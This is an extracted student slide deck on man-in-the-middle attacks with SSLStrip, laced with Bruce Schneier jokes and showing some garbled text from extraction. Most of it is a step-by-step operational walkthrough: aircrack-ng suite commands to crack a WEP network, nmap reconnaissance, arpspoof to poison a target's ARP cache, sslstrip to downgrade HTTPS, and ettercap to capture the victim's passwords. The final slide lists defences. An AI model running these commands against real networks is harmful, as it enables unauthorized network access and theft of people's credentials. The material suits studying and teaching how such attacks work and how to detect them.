Download - mitm - Man in the midle
-
7/31/2019 mitm - Man in the midle
1/18
Man-in-the-Middle
Attack With SSL StripKyle Benson
Trevor KiernanGlen Saunders
Bruce Schneier's earliest childhood
memory is encrypted .
-
7/31/2019 mitm - Man in the midle
2/18
What is SSL?Secure Socket Layer Predecessor to Transport Layer
Security (TLS)Establishes a secure connectionbetween two computersImportant for banking sites and
othersAuthenticates: the server is actuallywho it says it is
Bruce Schneier's p is irrational, and his q is imaginary.
-
7/31/2019 mitm - Man in the midle
3/18
Runs on port 443 (not http's port 80) Client sends server hello and certificate
Server sends a signed certificate Verified by Certificate Authority such as
Verisign Certificate used to encrypt data
How Does it Work?
-
7/31/2019 mitm - Man in the midle
4/18
What is MITM?
Alice is trying to talk to Bob Eve jumps in the middle
ARP spoofing (wireless) Physical insertion (wired)
Eve tells Bob she is Alice and Alice thatshe is Bob
Bruce Schneier killed Eve and Mallory with a birthday attack!
-
7/31/2019 mitm - Man in the midle
5/18
What is MITM? When Alice sends something to Eve
(thinking she's Bob), Eve can read it Eve forwards this information to Bob Bob replies to Eve (thinking she's Alice) Eve can read e-mail and intercept
supposedly secure data (user nameand passwords!)
Bruce Schneier is always the Man in the Middle.
-
7/31/2019 mitm - Man in the midle
6/18
What is ARP Spoofing? ARP = address resolution protocol Alice sends ARP request (who is
192.168.1.1?) Eve replies before router can so that
Alice thinks she is the router Now Alice's ARP cache is poisoned;
thinks Eve is the router Eve forwards packets to her router
-
7/31/2019 mitm - Man in the midle
7/18
What is SSLStrip? Performs afforementioned MITM attack Forwards all regular HTTP traffic Changes Alice's HTTP request to
HTTPS Forwards this request via HTTPS to
Bob Explicit HTTPS request is sent a fake
certificate signed by Eve Replaces images with secure lockBruce Schneier can draw a perfect circle with an Etch-a-
Sketch.
-
7/31/2019 mitm - Man in the midle
8/18
Capturing Information Ettercap pulls passwords and user
names for many different programsand protocols
Displays Bob's IP and URL SSLStrip creates a log file
Bruce Schneier can break elliptic curve cryptography by bending it to a circle.
-
7/31/2019 mitm - Man in the midle
9/18
What we did 1. Scan for networks 2. Crack a network 3. Connect to the cracked network 4. Learn about a host on the network 5. MITM on that Host 6. Strip his/her SSL 7. Scan for usernames and passwords 8. Exit gracefully
-
7/31/2019 mitm - Man in the midle
10/18
Scanning for Networks Airodump-ng wlan1
Bruce Schneier can divide by zero.
-
7/31/2019 mitm - Man in the midle
11/18
Crack it airodump-ng -c 11 -w target_router
wlan1 & aireplay-ng -1 0 -e target_router -h
[faked mac address] wlan1 after successful connection, aireplay-ng -3 -e target_router -h [faked
mac] wlan1 let the data rate climb and aircrack-ng target_router-01.cap Within 5 minutes you should have the
WEP key. :-D
-
7/31/2019 mitm - Man in the midle
12/18
Connect
Connect to the router with the card you just attacked with. It should still have the same faked mac
address it was set to in the previousarp-replay attack
So now its time for some recon
The tattoos on Bruce Schneier's fists say "Alice" and "Bob". You don't want to make him exchange keys over
your face.
-
7/31/2019 mitm - Man in the midle
13/18
RECON
Nmap -sP 192.168.1.0/28 This keeps the packet count lower and
limits it to pinging Find a host
We liked 192.168.1.2 Ran an os fingerprint on it and checked
which versions open ports were using This generates a lot of traffic This host looked good, and responded
to our probes, so lets MITM.
Bruce Schneier counts in binary. With his fists.
C il d 't B S h i B S h i
-
7/31/2019 mitm - Man in the midle
14/18
RECON homing in
Compilers don't warn Bruce Schneier, Bruce Schneier warns compilers.
-
7/31/2019 mitm - Man in the midle
15/18
MITM
arpspoof -i wlan0 -t [their ip] [router ip] arpspoof -i wlan0 -t 192.168.1.2
192.168.1.1
Bruce Schneier is always the Man in the Middle.
-
7/31/2019 mitm - Man in the midle
16/18
SSL strip
sslstrip -a -k -f -a : log all ssl traffic -k : kill current sessions
-f : insert a lock icon in their connections
Bruce Schneier's work isn't peer reviewed. He has no peers.
-
7/31/2019 mitm - Man in the midle
17/18
Passwords from the stream
ettercap -T -q -i wlan0 -T : text only -q : do not display packet contents
-i : interface to use This will log traffic over our connection
and filter the target's passwords,causing them to show in our window.
We can pipe this to a file as well.
The set of Bruce Schneier's weaknesses is amathematical constant. It is represented by the symbol
.
If Bruce Schneier wants your plaintext, he'll just
-
7/31/2019 mitm - Man in the midle
18/18
How to Prevent? Secure your damn network! (WEP is
NOT secure!) Wireshark
ARP replies appearing very frequently Invalid certificate error Nmap scans
Don't accept certificates that aren'tverified Static ARP tables
If Bruce Schneier wants your plaintext, he ll just squeeze it out of the ciphertext using his barehands